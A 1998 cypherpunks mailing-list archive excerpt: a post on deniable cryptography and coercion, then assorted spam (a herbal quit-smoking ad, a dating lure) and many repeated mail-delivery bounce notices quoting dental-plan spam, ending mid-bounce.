From: Nimrod Zimerman <zimerman@earthling.net>
Date: Mon, 30 Mar 1998 11:09:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Deniable Cryptography [was winnowing, chaffing etc]
In-Reply-To: <wxu38jfgiy.fsf@polysynaptic.iq.org>
Message-ID: <19980330220847.28943@hexagon>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, Mar 28, 1998 at 05:53:36PM -0500, mgraffam@mhv.net wrote:

> I've never really fully understood this assumption. It seems to me
> that any person or group that would beat a person isn't going to
> care much if Alice cooperated or not. 
> 
> All things considered, a group with enough power to grab Alice and
> beat her probably has ways to escape punishment from the law, or
> doesn't care about the law in the first place. 

Generally speaking, you bind attackers with constants (or else, most of the
cryptography we are using is pretty much useless). Why won't you bind
physical attackers with constants just as well?

The longer you are kept alive, the higher the chance you'll be released, be
it because your attackers run out of resources, suddenly feel guilty, find
out the information some other way or being caught by law enforcement (or
your friendly rebel group).
If your attackers can prove they've gotten all they need from you during the
first week, you might be killed or released (this might be a political
issue, at times. Prisoners of war will generally be kept alive, for various
purposes, such as gaining some more when an agreement is signed).
If they can't, they are bound to beat you, or try various other methods -
but they won't kill you right away. This is a good thing, for most people
(others might wish to end the torture, even by being killed, but they can't
do that. Tough luck).

True, if you are kidnaped by a very large organization, like a country, you
don't stand a chance - you will either give up your secrets, and/or die 
(history generally tells us that people can't stand torture. The exceptions
are remarkable, and probably indicate a certain level of mental illness,
before or after the act <g>). Smaller organizations are bound by constants
that might eventually be in your benefit.

> down and gave them her most important secrets. Even if she can't prove
> it.. so what? The rubber-hose group isn't exactly the boy scouts. They
> beat her the next day too, this time a little harder.

Excluding external influences, if the group isn't presenting any rewards,
every logical system against them is quite useless. It doesn't matter whether
you tell the secret or avoid telling it - it makes no difference. A function
with no parameters, and hence a constant outcome.

That's why I consider dynamic secret sharing a better approach.
Make certain the attackers need to catch a group of people in order
to gain the secret, and change the partial secrets every short period of time.
This isn't always practical, of course.

> So, the only way for Alice to win is to do the impossible (because this
> is reality, not TV) and that is to grab the rubber hose and beat them
> with it.

(Alice can always fascinate her attackers with a new and exciting
cryptosystem, and while they are busy studying it, sneak behind and hit
them on the heads with a selected cryptography oriented book).

                                                   Nimrod




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BUTCHER56 <BUTCHER56@aol.com>
Date: Mon, 30 Mar 1998 19:35:41 -0800 (PST)
Subject: Hi I want to meet you im a model!
Message-ID: <7ad9d9b9.35206364@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: BUTCHER56@aol.com
Subject: Hi I want to meet you im a model!
From: BUTCHER56 <BUTCHER56@aol.com>
Date: Mon, 30 Mar 1998 22:21:48 EST
Organization: AOL (http://www.aol.com)

Come to my home and get inside and you will seem!

click here




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Smoke-Away"<EMAIL@ELDQ.Earthlink.net>
Date: Tue, 31 Mar 1998 01:38:11 -0800 (PST)
To: cypherpunks@KOYT.toad.com
Subject: Quit Smoking in 7 Days Guaranteed! -QEVR
Message-ID: <199803310938.BAA20333@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear cypherpunks,

Quit Smoking in Just 7 Days Guaranteed!!! 

Flush nicotine cravings from your body naturally with SMOKE-AWAY!
Safely, easily and successfully, with No Cravings, Withdrawal or Weight 
gain!  Free yourself or someone you love from nicotine addiction with this
incredible all herbal program. ORDER NOW! The complete SMOKE-AWAY
program is now ONLY $49.95!  Call 1-800-611-5930 Ext.3395 for VISA OR
MASTER CARD ORDERS.  No risk, Money Back Guarantee. 
To order by mail,  print out this page, and send in the completed form below:
_________________________________________________________________________

                 Enclosed is $49.95 plus $5.00 shipping and handling
                 for each kit ordered. I understand that Smoke-Away
                 comes With a No Risk, Money Back Guarantee. 

                 Mail Check or Money Order to:


                            Behavioral Research Center

                                  Dept: 3395

                          5051 Castello Drive, Suite 235

                              Naples, Florida 34103

  NAME ________________________________________________________________

  ADDRESS _____________________________________________________________

  CITY_________________________________ STATE___________ ZIP ____________

                             __MASTERCARD __VISA

  CREDIT CARD NUMBER __________________________________________________

  EXPIRATION DATE ______________________________________________________

  SIGNATURE ____________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:38:00 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311231.HAA26917@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:31:50 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta2.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:31:50 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta2.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:31:51 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:35 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:39:37 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA11815@mx03.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:22 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta4.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx03.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:22 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta4.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:23 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:37 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:37:58 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA11843@mx03.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:27 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta3.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx03.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:27 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta3.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:28 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:41 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:37:51 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA02936@mx02.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:28 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta3.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx02.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:28 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta3.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:29 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:33 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:38:01 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA11859@mx03.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:30 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta3.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx03.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:30 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta3.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:31 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:44 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:37:56 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA02978@mx02.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:34 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx02.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:34 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:35 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:40 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:38:02 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA03709@mx05.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:38 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta4.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx05.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:38 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta4.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:39 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:46 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:42:24 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA27913@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:47 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta2.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:47 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta2.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:48 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:33 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:42:40 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA27968@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:54 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta4.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:54 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta4.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:55 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:39 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:42:37 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA27973@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:55 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta4.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:55 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta4.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:56 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:41 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:41:11 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311234.HAA27998@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:34:58 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta4.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx01.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:34:58 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta4.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:34:59 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:44 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:41:13 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311235.HAA28010@mx01.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:35:00 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
